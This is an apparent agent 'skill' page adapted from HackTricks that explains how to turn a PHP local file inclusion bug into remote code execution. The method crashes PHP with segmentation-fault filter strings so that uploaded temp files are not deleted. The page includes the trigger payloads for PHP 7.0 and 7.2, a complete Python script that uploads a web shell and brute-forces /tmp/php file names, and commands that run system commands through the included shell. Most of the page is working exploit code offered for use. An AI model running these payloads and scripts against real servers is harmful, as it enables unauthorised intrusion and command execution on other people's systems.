Hacktricks-skills lfi2rce-segmentation-fault

Exploit Local File Inclusion (LFI) vulnerabilities to achieve Remote Code Execution (RCE) by triggering PHP segmentation faults that leave temporary upload files undeleted. Use this skill whenever you find an LFI vulnerability in a PHP application and want to escalate to RCE; the application does not need its own upload feature, because PHP writes the temporary file for any multipart POST before the script runs. Trigger this skill for any LFI exploitation, PHP segmentation fault attacks, or when you need to brute-force temporary PHP file paths.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/pentesting-web/file-inclusion/lfi2rce-via-segmentation-fault/SKILL.MD
source content

LFI2RCE via Segmentation Fault Exploitation

This skill helps you exploit Local File Inclusion (LFI) vulnerabilities in PHP applications to achieve Remote Code Execution (RCE) by triggering segmentation faults that prevent cleanup of temporary upload files.

Technique Overview

When PHP receives a multipart/form-data POST that contains a file part, its upload handler writes that part to a temporary file named /tmp/php<random_string> (under upload_tmp_dir, or the system temp directory when that is unset) before the script starts running. Normally, these files are deleted at the end of the request, during PHP's request shutdown. However, if the included code makes PHP crash with a segmentation fault, the worker process dies before shutdown runs, the temporary file is never deleted, and it stays on disk where the LFI can include it.

The Attack Flow

  1. Find LFI vulnerability - Identify a parameter that includes files
  2. Trigger segmentation fault - Send a multipart POST carrying your PHP payload as a file part, with the segfault trigger in the LFI parameter
  3. Brute-force temp file - Search for the undeleted temporary file using LFI
  4. Execute arbitrary code - Include the temp file containing your payload

PHP Version-Specific Payloads

Different PHP versions require different segmentation fault triggers. Both are crash bugs in specific PHP builds, not features: if the request comes back with a normal 200 response instead of a dropped connection or a 5xx from the proxy, the target build is not affected by that trigger. Note also that the string.strip_tags filter used by the 7.0 trigger was deprecated in PHP 7.3 and removed in PHP 8.0, so it cannot work against newer targets.

PHP 7.0

include("php://filter/string.strip_tags/resource=/etc/passwd");

PHP 7.2+

include("php://filter/convert.quoted-printable-encode/resource=data://,%bfAAAAAAAAAAAAAAAAAAAAAAA%ff%ff%ff%ff%ff%ff%ff%ffAAAAAAAAAAAAAAAAAAAAAAAA");

Prerequisites

  • PHP application with LFI vulnerability
  • File uploads enabled in PHP (file_uploads=On, the default); the target script itself does not need to handle uploads, since PHP writes the temp file for any multipart POST before the script runs
  • Knowledge of the include parameter name (e.g., ?i=, ?file=, ?page=)
  • Access to run Python scripts (for automation)

Exploitation Steps

Step 1: Upload File with Segmentation Fault Payload

Use the upload-segfault.py script to send a POST request with your malicious file while triggering the segmentation fault:

python scripts/upload-segfault.py \
  --url "http://target.com/index.php" \
  --include-param "i" \
  --php-version "7.0" \
  --payload-file "shell.php"

Parameters:

  • --url: Base URL of the vulnerable application
  • --include-param: Name of the LFI parameter (e.g., i, file, page)
  • --php-version: Target PHP version (7.0 or 7.2)
  • --payload-file: Your PHP payload file to upload

Step 2: Brute-Force Temporary File Name

The temporary file is named /tmp/php<random_string>. Use the brute-force script to find it:

python scripts/bruteforce-temp-file.py \
  --url "http://target.com/index.php" \
  --include-param "i" \
  --marker "spyd3r" \
  --threads 10

Parameters:

  • --url: Base URL of the vulnerable application
  • --include-param: Name of the LFI parameter
  • --marker: String to search for in response (something unique in your payload)
  • --threads: Number of parallel threads (default: 1)

Step 3: Verify and Execute

Once the temporary file is found, you can include it directly:

curl "http://target.com/index.php?i=/tmp/phpFOUND_FILENAME"
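The following is an added example that ties the Technique Overview and Steps 1-3 together in one stand-alone script. It is not the skill's upload-segfault.py or bruteforce-temp-file.py, and it assumes a target that does include($_GET[param]) directly, runs on Linux (so temp names follow the mkstemp template php + 6 alphanumeric characters), and a hypothetical web shell of our own that echoes the marker. Every crashed request leaves one temp file per file part (up to max_file_uploads, default 20), which is why the crash request is repeated many times before the hunt starts; expected_guesses() shows how the odds scale with the number of leftover files.

```python
"""Added example (not the skill's scripts): send the crashing multipart POST,
then hunt for leftover /tmp/php?????? files through the LFI."""
import random
import string
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, Iterable, Optional, Tuple

MARKER = "spyd3r"
# Hypothetical payload: echo the marker so a hit is recognisable, then run a command.
WEBSHELL = f'<?php echo "{MARKER}"; system($_GET["cmd"]); ?>'.encode()

# Version-specific triggers from the skill page, already in on-the-wire
# (percent-encoded) form: %bf/%ff must reach PHP as single high bytes.
SEGFAULT_TRIGGERS = {
    "7.0": "php://filter/string.strip_tags/resource=/etc/passwd",
    "7.2": ("php://filter/convert.quoted-printable-encode/resource=data://,"
            "%bfAAAAAAAAAAAAAAAAAAAAAAA%ff%ff%ff%ff%ff%ff%ff%ff"
            "AAAAAAAAAAAAAAAAAAAAAAAA"),
}
TEMP_CHARSET = string.ascii_letters + string.digits   # mkstemp's XXXXXX alphabet
CANDIDATE_SPACE = len(TEMP_CHARSET) ** 6              # 62**6 possible names
MAX_FILE_UPLOADS = 20                                 # php.ini default

Fetch = Callable[[str, Optional[bytes], dict], Tuple[Optional[int], bytes]]


def crash_url(base: str, param: str, php_version: str) -> str:
    """Include parameter carrying the trigger; appended raw so %xx is not double-encoded."""
    return f"{base}?{urllib.parse.quote(param)}={SEGFAULT_TRIGGERS[php_version]}"


def build_multipart(files: int = MAX_FILE_UPLOADS,
                    boundary: str = "----lfi2rceBoundary") -> Tuple[bytes, str]:
    """Multipart body with `files` file parts; PHP writes each one to a temp file
    before the script runs, so a crash leaves that many files behind."""
    parts = []
    for n in range(files):
        head = (f"--{boundary}\r\n"
                f'Content-Disposition: form-data; name="f{n}"; filename="f{n}.txt"\r\n'
                "Content-Type: application/octet-stream\r\n\r\n")
        parts.append(head.encode() + WEBSHELL + b"\r\n")
    body = b"".join(parts) + f"--{boundary}--\r\n".encode()
    return body, f"multipart/form-data; boundary={boundary}"


def http_fetch(url: str, data: Optional[bytes] = None,
               headers: Optional[dict] = None) -> Tuple[Optional[int], bytes]:
    """Real transport: (status, body); status None means the connection died
    without an HTTP response, which is what a mod_php segfault looks like."""
    req = urllib.request.Request(url, data=data, headers=headers or {})
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status, resp.read()
    except urllib.error.HTTPError as e:        # e.g. 502 from nginx in front of PHP-FPM
        return e.code, e.read()
    except OSError:                            # URLError, reset, timeout, empty reply
        return None, b""


def classify_response(status: Optional[int]) -> str:
    """Dropped connection or 5xx = worker died mid-request; 200 = trigger did nothing."""
    return "crashed" if status is None or status >= 500 else "alive"


def send_crash_request(base: str, param: str, php_version: str,
                       fetch: Fetch = http_fetch) -> str:
    body, ctype = build_multipart()
    status, _ = fetch(crash_url(base, param, php_version), body,
                      {"Content-Type": ctype, "Content-Length": str(len(body))})
    return classify_response(status)


def expected_guesses(leftover_files: int) -> float:
    """Expected probes before a random guess hits any of the leftover files."""
    return CANDIDATE_SPACE / leftover_files


def random_names(rng: random.Random) -> Iterable[str]:
    while True:
        yield "php" + "".join(rng.choice(TEMP_CHARSET) for _ in range(6))


def hunt(base: str, param: str, candidates: Iterable[str], attempts: int,
         fetch: Fetch = http_fetch, marker: str = MARKER) -> Optional[str]:
    """Include /tmp/<candidate> via the LFI; the marker in the body proves our
    payload was included (and executed) from that temp file."""
    for name, _ in zip(candidates, range(attempts)):
        path = f"/tmp/{name}"
        _, body = fetch(f"{base}?{urllib.parse.quote(param)}={path}", None, {})
        if marker.encode() in body:
            return path
    return None


if __name__ == "__main__":  # usage against the page's local lab
    BASE, PARAM = "http://localhost:8008/index.php", "i"
    crashes = sum(send_crash_request(BASE, PARAM, "7.0") == "crashed" for _ in range(200))
    files = max(1, crashes * MAX_FILE_UPLOADS)
    print(f"{crashes} crashes -> ~{files} temp files; expected guesses ~{expected_guesses(files):.0f}")
    found = hunt(BASE, PARAM, random_names(random.Random()), attempts=1_000_000)
    print("found:", found, "->", f"{BASE}?{PARAM}={found}&cmd=id" if found else "nothing")
```

Run the crash loop first and check that classify_response reports "crashed" before hunting: with 200 crashes and 20 parts each, roughly 4,000 leftover files remain and a random guess needs about 62^6 / 4000, i.e. around 14 million probes on average, which is why the real scripts push far more crashing requests and many threads before the hunt becomes practical.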

Testing Environment

For local testing, use the Docker image:

docker run -d -p 8008:80 easyengine/php7.0

Example Workflow

# 1. Create your payload
echo '<?php system($_GET["cmd"]); ?>' > shell.php

# 2. Upload with segmentation fault trigger
python scripts/upload-segfault.py \
  --url "http://localhost:8008/index.php" \
  --include-param "i" \
  --php-version "7.0" \
  --payload-file "shell.php"

# 3. Brute-force the temp file
python scripts/bruteforce-temp-file.py \
  --url "http://localhost:8008/index.php" \
  --include-param "i" \
  --marker "spyd3r" \
  --threads 20

# 4. Execute commands via the included file
curl "http://localhost:8008/index.php?i=/tmp/phpABC123&cmd=id"

Important Notes

  • Timing matters: the crash must happen while the request is being processed (inside the include), so the worker dies before the request shutdown that would delete the temp files
  • File naming: on Linux PHP names the temp file with the mkstemp template php + 6 characters from [A-Za-z0-9], giving 62^6 possible names; blind brute force only pays off once many crashed requests have filled /tmp, since each crashed request leaves one temp file per file part, up to max_file_uploads (default 20)
  • Marker detection: Include a unique string in your payload to detect successful inclusion
  • Thread safety: Use multiple threads for faster brute-forcing, but be mindful of rate limiting
  • PHP versions: Test both payload variants if you're unsure of the target PHP version

Troubleshooting

No temp file found after upload

  • Verify the segmentation fault payload works for the target PHP version
  • Check if the file upload is actually being processed
  • Try both PHP 7.0 and 7.2 payloads

Brute-force too slow

  • Send more crashing requests first: every leftover temp file improves the odds of each guess, so filling /tmp is cheaper than guessing harder
  • Increase thread count with --threads
  • Reduce charset if you know the file naming pattern
  • Check network latency to the target

Segmentation fault not triggered

  • Confirm the LFI parameter accepts php://filter wrappers (an application that appends an extension or prefixes a directory to the parameter will break the wrapper)
  • The string.strip_tags filter was deprecated in PHP 7.3 and removed in PHP 8.0, so the 7.0 trigger cannot work on newer builds
  • A normal 200 response means the build is not affected by that trigger; try alternative segmentation fault payloads from research
